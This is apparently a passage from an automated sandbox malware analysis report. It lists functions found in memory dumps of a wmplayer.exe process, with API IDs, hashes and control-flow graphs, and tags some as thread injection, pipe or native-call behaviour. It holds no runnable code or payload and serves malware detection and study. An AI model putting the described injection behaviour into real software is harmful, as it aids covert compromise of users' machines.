158->160 160->116
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatPathUsercalloc
                                                                                                                                                                                                                                                                                                          • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                                                                                                                                                                                          • API String ID: 4207655178-84560671
                                                                                                                                                                                                                                                                                                          • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                          • Instruction ID: e223ee4dbbf5ed40f6477b25e42edebbb070ff4a3657ff8e4fb084c360673a5f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63A25C7051CB888FE375DF1898897EAB7E4FBA9701F500A2FD48AC3251DB74A5518B83
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A1CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                          • API String ID: 167522227-2547889144
                                                                                                                                                                                                                                                                                                          • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                                                                                                                                          • Instruction ID: b9ad6576a9a9384c7686aeaa3cf457bfcaeef1ae115d877d7191817bd73836ca
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20918070A48A894BFB95EB64D9986AB73E1FF94301F40872AD54FC7191DF78E804C782
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDD004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                          • Instruction ID: bf972d49c62478aaf627f3f23814676249c66efdc323a255554f1222e3827fcc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0318F31208A488FF795EF38D8D87AA77E5FBA8314F50062AE45BC21D0DB34D955CB82
                                                                                                                                                                                                                                                                                                          Function 00007DF4F8202E90 Relevance: 4.5, APIs: 3, Instructions: 40nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuerySystem$malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1603438391-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bc7880a8700dacad39c518c9bd8fc875244ffc3df34e874a8ca13a14ac018e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD0119346599458FE799EB24EC5CAA677F1FFE4301F548069A44BC22A0DF3CE505CB42
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81B25D4 Relevance: 4.5, APIs: 3, Instructions: 40nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693745130.00007DF4F81B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81B1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81b1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuerySystem$free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3648661966-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6878ed6d48af6add7b11d44b40f43b16020158646f4cf55b4d6e1bfb17d2e3cf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD0131346589458FF789EB25EC58B6677E1FFA4301F444529A44BC21A0DF7CD544CB41
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE3158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 295 21ab2fe3158-21ab2fe3171 296 21ab2fe3173-21ab2fe3176 295->296 297 21ab2fe317b-21ab2fe317e 295->297 298 21ab2fe320e-21ab2fe3216 296->298 299 21ab2fe3180-21ab2fe3185 297->299 300 21ab2fe318a-21ab2fe319f 297->300 299->298 301 21ab2fe31a1-21ab2fe31a5 300->301 302 21ab2fe31ab-21ab2fe31da 300->302 301->302 303 21ab2fe31dc-21ab2fe31e8 NtAcceptConnectPort 302->303 304 21ab2fe31ea 302->304 305 21ab2fe31ef-21ab2fe31f1 303->305 304->305 306 21ab2fe31f3-21ab2fe31fd 305->306 307 21ab2fe320c 305->307 308 21ab2fe3205 306->308 309 21ab2fe31ff-21ab2fe3203 306->309 307->298 310 21ab2fe320a 308->310 309->310 310->307
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ea4604b3bf47958f468317763ac49714dd6e0898c9258db44d61da4a9b5bce9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A421D5707099C84FF750AEAD88CC77976E1E7B9305F50053FE549C3250D629DA588B43
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FD262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 398 21ab2fd262c-21ab2fd2666 call 21ab301342c 401 21ab2fd2738-21ab2fd273b 398->401 402 21ab2fd266c-21ab2fd2680 call 21ab3013426 Thread32First 398->402 403 21ab2fd288e-21ab2fd28a1 401->403 404 21ab2fd2741-21ab2fd2749 401->404 409 21ab2fd2685-21ab2fd268a 402->409 404->403 406 21ab2fd274f-21ab2fd2750 404->406 408 21ab2fd2752-21ab2fd276b 406->408 414 21ab2fd287e-21ab2fd2888 408->414 415 21ab2fd2771-21ab2fd2788 SuspendThread 408->415 410 21ab2fd2716-21ab2fd2722 call 21ab3013420 409->410 411 21ab2fd2690-21ab2fd269a 409->411 417 21ab2fd2727-21ab2fd2729 410->417 411->410 418 21ab2fd269c-21ab2fd26a6 411->418 414->403 414->408 420 21ab2fd2796-21ab2fd2798 415->420 417->409 419 21ab2fd272f-21ab2fd2732 CloseHandle 417->419 418->410 424 21ab2fd26a8-21ab2fd26ae 418->424 419->401 421 21ab2fd2873-21ab2fd287c 420->421 422 21ab2fd279e-21ab2fd27a2 420->422 421->414 425 21ab2fd27a4-21ab2fd27ae 422->425 426 21ab2fd27b0-21ab2fd27b1 422->426 428 21ab2fd26d6-21ab2fd26dc 424->428 429 21ab2fd26b0-21ab2fd26d2 424->429 430 21ab2fd27b4-21ab2fd27b6 425->430 426->430 431 21ab2fd2705-21ab2fd2712 428->431 432 21ab2fd26de-21ab2fd26f8 428->432 429->419 436 21ab2fd26d4 429->436 430->421 433 21ab2fd27bc-21ab2fd27d2 430->433 431->410 432->419 441 21ab2fd26fa-21ab2fd2702 432->441 435 21ab2fd27d4-21ab2fd27e5 433->435 438 21ab2fd27e7-21ab2fd27ea 435->438 439 21ab2fd27fe 435->439 436->431 442 21ab2fd27f7-21ab2fd27fc 438->442 443 21ab2fd27ec-21ab2fd27f5 438->443 440 21ab2fd2800-21ab2fd280a 439->440 444 21ab2fd2862-21ab2fd286a 440->444 445 21ab2fd280c-21ab2fd280e 440->445 441->431 442->440 443->440 444->435 448 21ab2fd2870-21ab2fd2871 444->448 446 21ab2fd2814-21ab2fd2821 445->446 447 21ab2fd28ad-21ab2fd28b1 445->447 449 21ab2fd2823-21ab2fd282e 446->449 450 21ab2fd283d 446->450 451 21ab2fd28b3-21ab2fd28bd 447->451 452 21ab2fd28bf-21ab2fd28cc 447->452 448->421 453 21ab2fd28a2-21ab2fd28ab 449->453 454 21ab2fd2830-21ab2fd283b 449->454 455 21ab2fd283f-21ab2fd2842 450->455 451->452 451->455 456 21ab2fd28e9-21ab2fd28ed 452->456 457 21ab2fd28ce-21ab2fd28da 452->457 453->455 454->449 454->450 455->444 460 21ab2fd2844-21ab2fd285b 455->460 456->450 461 21ab2fd28f3-21ab2fd28f6 456->461 458 21ab2fd28fb-21ab2fd2903 457->458 459 21ab2fd28dc-21ab2fd28e7 457->459 458->455 459->456 459->457 460->444 461->455
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                          • Instruction ID: e7357069af6cccd7732ef109dab6d8f260855e91b14f24d6df5b2b40e47c905a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C891273024DA498BEB68DB38D8996B973D1FB75358F14015FD04AC7186DA34EA62CBC3
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A22CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2248422592-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                                                                                                                                          • Instruction ID: c9dfa1fbd981c319dfba5ad2bcdc2590fcd30a1330a429f7c2a812236fc01523
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAE15130A48A494FEB94EF68D9895AA77E2FFA8300F14472ED44FC71A1DB34E945C742
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDC2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f74594bd488e9c9447f167e8d48e16481182333699f963ac214c05297256a68
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC22193061C6944EE72DEB2C989A2F977D0F7A5305F24076FD4DBC2192DA34E626C782
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 02bee965a68669b49651fd8547171b7f5a540bb5bdd44c2631d3690c38564ecc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0381983161DAC98BF766AB2C944C7FA73D0FBB8748F50461BE446C7184EB65EA108783
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                                                                                                                                          • Instruction ID: c91a1f4288483d11498b33c53355e7db06c49ad81e33e8a4f377bd34deb8a16d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F0B774A1CB848FEB64EB2CD489B9977E1FBA9304F50451AE84CC3245EA34A8408B86
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                                                                                                                                          • Instruction ID: 55457283bec37138b6211a0cf49bdbc5ebfcf1476aa45d089a2565aea95d2150
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E09B712096448FDB00EF98C8C59A9B7E0E7F9304F400D2BE84ACA164D274E658C683
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1499544792c1867edc6fc20d06be6b2ed12c14b5c9a1c8f7e475b9db42d4460d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBD01234A187858BE610BB2884406097BE1F7EE718F548619E84483321E239E5518687
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                                                                                                                                          • Instruction ID: 902080d0ff7b66866639da5c1b4976dda34a407a6a5ebced3633c41030c2201b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD01234A187898BE710AB2895406097BE1F7EE318F54471EE84583310F639E55086C7
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8bbf7d598d678889fcc0c1a2286d6ce31edb9bbb40148e62bd29043340cf4bcd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D0A734A2CBC98FEA60F73C890070937E1F7FA308F91461AA449C3214F62DE5508387
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                                                                                                                                          • Instruction ID: cbc33e29ba33ad208771c95a9e732f99a780ea466f6142955a52164a1207e66e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96C08C24A1E84A4AFA0776BEAC943983090A3BE308F8010029404C2180FE0DE6A06393
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE2DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000021AB2FD5367), ref: 0000021AB2FE2DEC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0fbc2481aa2e899ede54aefd2f63f355c39a6cbcd6c37ee6edac4ccc5ca83011
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AC08C2061E88B4BF925727E4C847582080A36E348F800023A406C2184F80CE7A0539B
                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A1438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
